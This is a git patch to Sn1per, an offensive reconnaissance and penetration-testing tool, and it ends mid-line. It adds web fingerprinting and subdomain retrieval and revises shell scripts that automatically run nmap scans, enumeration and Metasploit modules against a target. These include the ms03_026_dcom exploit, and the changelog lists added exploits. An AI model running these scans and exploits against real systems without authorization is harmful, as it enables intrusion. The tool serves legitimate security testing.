From 5ccf95deeb8ebeaad44e6751002d6aa197a4d2f0 Mon Sep 17 00:00:00 2001 From: WP Engine Marketing Date: Sat, 16 Mar 2019 11:11:31 -0700 Subject: [PATCH] Sn1per Community Edition by @xer0dayz - https://xerosecurity.com --- CHANGELOG.md | 13 ++- README.md | 13 ++- install.sh | 5 +- modes/flyover.sh | 12 ++- modes/fullportonly.sh | 12 +-- modes/fullportscan.sh | 5 +- modes/normal.sh | 169 +++++++++++++++------------------ modes/normal_webporthttp.sh | 161 +------------------------------- modes/normal_webporthttps.sh | 162 +------------------------------- modes/recon.sh | 29 ++++++ modes/stealth.sh | 28 +++++- modes/web_autopwn.sh | 174 ++++++++++++++++++++++++++++++++++ modes/webporthttp.sh | 173 +++------------------------------- modes/webporthttps.sh | 176 +++-------------------------------- sniper | 60 +++++++----- sniper.conf | 9 ++ 16 files changed, 422 insertions(+), 779 deletions(-) create mode 100644 modes/web_autopwn.sh diff --git a/CHANGELOG.md b/CHANGELOG.md index 40ba6dee..35b21ec7 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,8 +1,17 @@ ## CHANGELOG: -* v6.2 - Fixed issue with sniper --list not opening workspace directory -* v6.2 - Added config option to enable/disable subdomain hijacking checks in sniper.conf * v6.2 - Added Glassfish Admin traversal MSF exploit * v6.2 - Added ElasticSearch Java Injection MSF RCE exploit +* v6.2 - Added WebTech web fingerprinting tool +* v6.2 - Added censys subdomain retrieval and API key config +* v6.2 - Added project sonar sub-domain retrieval +* v6.2 - Added command switch to remove workspace (-d) +* v6.2 - Added command switch to remove host (-dh) +* v6.2 - Added DockerFile to run Sn1per in Docker (CC. Hariom Vashisth ) +* v6.2 - Changed option to automatically import all NMap XML's into Metasploit's DB +* v6.2 - Changed option to automatically load Sn1per Professional's report when scans complete +* v6.2 - Added config option to enable/disable subdomain hijacking checks in sniper.conf +* v6.2 - Fixed issue with sniper --list command having invalid reference +* v6.2 - Fixed issue with theharvester not running * v6.1 - Added automated web scanning via Burpsuite Pro 2.x API for all 'web' mode scans * v6.1 - Added Waybackmachine URL retrieval to all web scans * v6.1 - Converted all exploits to Metasploit diff --git a/README.md b/README.md index 133f9e3b..a90c42fe 100644 --- a/README.md +++ b/README.md @@ -84,6 +84,11 @@ To obtain a Sn1per Professional license, go to https://xerosecurity.com. ./install.sh ``` +## DOCKER INSTALL: +``` +docker build Dockerfile +``` + ## USAGE: ``` [*] NORMAL MODE @@ -134,6 +139,12 @@ sniper -t|--target [*] LOOT REIMPORT FUNCTION sniper -w --reimport +[*] DELETE WORKSPACE +sniper -w -d + +[*] DELETE HOST FROM WORKSPACE +sniper -w -t -dh + [*] SCAN STATUS sniper --status @@ -158,7 +169,7 @@ sniper -u|--update https://gist.github.com/1N3/8214ec2da2c91691bcbc ## LICENSE: -This software is free to distribute, modify and use with the condition that credit is provided to the creator (xer0dayz@XeroSecurity) and is not for commercial use. Permission to distribute any part of the code for sale is strictly prohibited. +This software is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz @XeroSecurity) and is not for commercial use. Permission to distribute any part of the code for sale is strictly prohibited. ## DONATIONS: Donations are welcome. This will help fascilitate improved features, frequent updates and better overall support for sniper. diff --git a/install.sh b/install.sh index 2f7d1bc3..fae3b155 100755 --- a/install.sh +++ b/install.sh @@ -79,8 +79,10 @@ git clone https://github.com/1N3/jexboss.git git clone https://github.com/maurosoria/dirsearch.git git clone https://github.com/jekyc/wig.git git clone https://github.com/rbsec/dnscan.git -git clone https://github.com/nmap/nmap.git +git clone https://github.com/christophetd/censys-subdomain-finder.git +pip install -r $PLUGINS_DIR/censys-subdomain-finder/requirements.txt pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt +pip install webtech mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR unzip slurp.zip rm -f slurp.zip @@ -94,7 +96,6 @@ cp $INSTALL_DIR/sniper.conf ~/.sniper.conf 2> /dev/null cd $PLUGINS_DIR/BruteX/ && bash install.sh 2> /dev/null cd $PLUGINS_DIR/spoofcheck/ && pip install -r requirements.txt 2> /dev/null cd $PLUGINS_DIR/CMSmap/ && pip3 install . && python3 setup.py install -#cd $PLUGINS_DIR/nmap/ && ./configure && make && make install cd $INSTALL_DIR mkdir $LOOT_DIR 2> /dev/null mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null diff --git a/modes/flyover.sh b/modes/flyover.sh index eabf66bd..7f1fedcc 100644 --- a/modes/flyover.sh +++ b/modes/flyover.sh @@ -61,6 +61,7 @@ if [ "$MODE" = "flyover" ]; then dig all +short $TARGET 2> /dev/null > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null & dig all +short -x $TARGET 2> /dev/null >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null & + dig A +short $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null & wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null @@ -68,6 +69,9 @@ if [ "$MODE" = "flyover" ]; then curl --connect-timeout 3 -I -s -R http://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null & curl --connect-timeout 3 -I -s -R https://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null & + webtech -u http://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-http.txt 2> /dev/null & + webtech -u https://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-https.txt 2> /dev/null & + nmap -sS -T5 --open -Pn -p $QUICK_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null & cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null @@ -76,8 +80,8 @@ if [ "$MODE" = "flyover" ]; then /bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null & /bin/CutyCapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null & else - cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null & - cutycapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null & + cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null & + cutycapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null & fi echo "$TARGET" >> $LOOT_DIR/scans/updated.txt @@ -90,7 +94,7 @@ if [ "$MODE" = "flyover" ]; then done sort -u $LOOT_DIR/domains/targets.txt 2>/dev/null >> $LOOT_DIR/domains/domains-all-sorted.txt - + sort -u LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null sleep 20 rm -f $INSTALL_DIR/wget-log* 2> /dev/null echo -e "$OKRED=====================================================================================$RESET" @@ -117,5 +121,7 @@ if [ "$MODE" = "flyover" ]; then echo "$TARGET" >> $LOOT_DIR/scans/updated.txt done fi + + sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null exit fi \ No newline at end of file diff --git a/modes/fullportonly.sh b/modes/fullportonly.sh index 43ad4fc6..f9d29ac8 100644 --- a/modes/fullportonly.sh +++ b/modes/fullportonly.sh @@ -16,7 +16,7 @@ if [ "$MODE" = "fullportonly" ]; then mkdir $LOOT_DIR/scans 2> /dev/null mkdir $LOOT_DIR/output 2> /dev/null fi - args="$args --noreport -m fullportonly" + args="$args --noreport -m fullportonly" echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-fullnmapscan.txt sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 exit @@ -25,29 +25,29 @@ if [ "$MODE" = "fullportonly" ]; then logo echo "$TARGET" >> $LOOT_DIR/domains/targets.txt if [ -z "$PORT" ]; then - #nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt - nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + cp -f $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -sU -sV -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml + nmap -Pn -sU -sV -A -T4 -v -p $DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -A -v -sV -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET + nmap -Pn -A -v -sV -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml | tee $LOOT_DIR/nmap/nmap-$TARGET sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -A -v -sV -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp + nmap -Pn -A -v -sV -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp-port$PORT.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null fi diff --git a/modes/fullportscan.sh b/modes/fullportscan.sh index a61aac60..922c939c 100644 --- a/modes/fullportscan.sh +++ b/modes/fullportscan.sh @@ -7,14 +7,15 @@ else echo -e "$OKRED RUNNING FULL PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" #nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt - nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + cp -f $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -sU -sV -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp + nmap -Pn -sU -sV -A -T4 -v -p $DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null fi \ No newline at end of file diff --git a/modes/normal.sh b/modes/normal.sh index ae825c31..cddd09f2 100644 --- a/modes/normal.sh +++ b/modes/normal.sh @@ -50,6 +50,7 @@ echo -e "$OKRED GATHERING DNS INFO $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null +dig A $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null dnsenum $TARGET 2> /dev/null mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null @@ -135,6 +136,7 @@ port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` +port_8888=`grep 'portid="9200"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_16992=`grep 'portid="16992"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_27017=`grep 'portid="27017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` @@ -276,9 +278,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING SMTP USER ENUM $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port25.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port25.raw > $LOOT_DIR/output/msf-$TARGET-port25.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port25.raw 2> /dev/null + msfconsole -q -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port25-smtp_enum.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port25-smtp_enum.raw > $LOOT_DIR/output/msf-$TARGET-port25-smtp_enum.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port25-smtp_enum.raw 2> /dev/null fi fi @@ -382,6 +384,12 @@ else wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null curl --connect-timeout 5 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null curl --connect-timeout 5 -I -s -R -L http://$TARGET | tee $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null + if [ "$WEBTECH" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + webtech -u http://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http.txt + fi echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" @@ -431,9 +439,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/nfs/nfsmount; setg RHOSTS \"$TARGET\"; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port111.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port111.raw > $LOOT_DIR/output/msf-$TARGET-port111.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port111.raw 2> /dev/null + msfconsole -q -x "use auxiliary/scanner/nfs/nfsmount; setg RHOSTS \"$TARGET\"; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port111-nfsmount.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port111-nfsmount.raw > $LOOT_DIR/output/msf-$TARGET-port111-nfsmount.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port111-nfsmount.raw 2> /dev/null fi if [ "$SHOW_MOUNT" = "1" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" @@ -479,9 +487,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/dcerpc/ms03_026_dcom; setg RHOST \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port135.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port135.raw > $LOOT_DIR/output/msf-$TARGET-port135.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port135.raw 2> /dev/null + msfconsole -q -x "use exploit/windows/dcerpc/ms03_026_dcom; setg RHOST \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port135-ms03_026_dcom.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port135-ms03_026_dcom.raw > $LOOT_DIR/output/msf-$TARGET-port135-ms03_026_dcom.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port135-ms03_026_dcom.raw 2> /dev/null fi fi @@ -506,9 +514,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/netbios/nbname; setg RHOSTS $TARGET; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port137.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port137.raw > $LOOT_DIR/output/msf-$TARGET-port137.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port137.raw 2> /dev/null + msfconsole -q -x "use auxiliary/scanner/netbios/nbname; setg RHOSTS $TARGET; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-nbname.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-nbname.raw > $LOOT_DIR/output/msf-$TARGET-nbname.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-nbname.raw 2> /dev/null fi fi @@ -557,9 +565,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/snmp/snmp_enum; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port161.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port161.raw > $LOOT_DIR/output/msf-$TARGET-port161.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port161.raw 2> /dev/null + msfconsole -q -x "use scanner/snmp/snmp_enum; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-snmp_enum.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-snmp_enum.raw > $LOOT_DIR/output/msf-$TARGET-snmp_enum.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-snmp_enum.raw 2> /dev/null fi fi @@ -578,9 +586,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/snmp/snmp_enum; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port162.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port162.raw > $LOOT_DIR/output/msf-$TARGET-port162.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port162.raw 2> /dev/null + msfconsole -q -x "use scanner/snmp/snmp_enum; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-snmp_enum.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-snmp_enum.raw > $LOOT_DIR/output/msf-$TARGET-snmp_enum.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-snmp_enum.raw 2> /dev/null fi fi @@ -632,6 +640,12 @@ else wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null curl --connect-timeout 5 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null curl --connect-timeout 5 -I -s -R -L https://$TARGET | tee $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null + if [ "$WEBTECH" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + webtech -u https://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https.txt + fi echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" @@ -741,44 +755,6 @@ else fi fi -if [ -z "$port_623" ]; -then - echo -e "$OKRED + -- --=[Port 623 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 623 opened... running tests...$RESET" - if [ "$AMAP" = "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING AMAP $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - amap $TARGET 623 -A - fi - if [ "$NMAP_SCRIPTS" = "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 623 $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port623.txt - fi -fi - -if [ -z "$port_624" ]; -then - echo -e "$OKRED + -- --=[Port 624 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 624 opened... running tests...$RESET" - if [ "$AMAP" = "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING AMAP $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - amap $TARGET 624 -A - fi - if [ "$NMAP_SCRIPTS" = "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 624 $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port624.txt - fi -fi - if [ -z "$port_1099" ]; then echo -e "$OKRED + -- --=[Port 1099 closed... skipping.$RESET" @@ -800,8 +776,12 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use gather/java_rmi_registry; set RHOST "$TARGET"; run;" - msfconsole -q -x "use scanner/misc/java_rmi_server; set RHOST "$TARGET"; run;" + msfconsole -q -x "use gather/java_rmi_registry; set RHOST "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_registry.txt + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_registry.raw > $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_registry.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_registry.raw 2> /dev/null + msfconsole -q -x "use scanner/misc/java_rmi_server; set RHOST "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_server.txt + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_server.raw > $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_server.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_server.raw 2> /dev/null fi fi @@ -864,9 +844,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/mssql/mssql_ping; setg RHOSTS \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port3306.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port3306.raw > $LOOT_DIR/output/msf-$TARGET-port3306.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port3306.raw 2> /dev/null + msfconsole -q -x "use auxiliary/scanner/mssql/mssql_ping; setg RHOSTS \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port3306-mssql_ping.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port3306-mssql_ping.raw > $LOOT_DIR/output/msf-$TARGET-port3306-mssql_ping.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port3306-mssql_ping.raw 2> /dev/null fi fi @@ -911,7 +891,9 @@ else echo -e 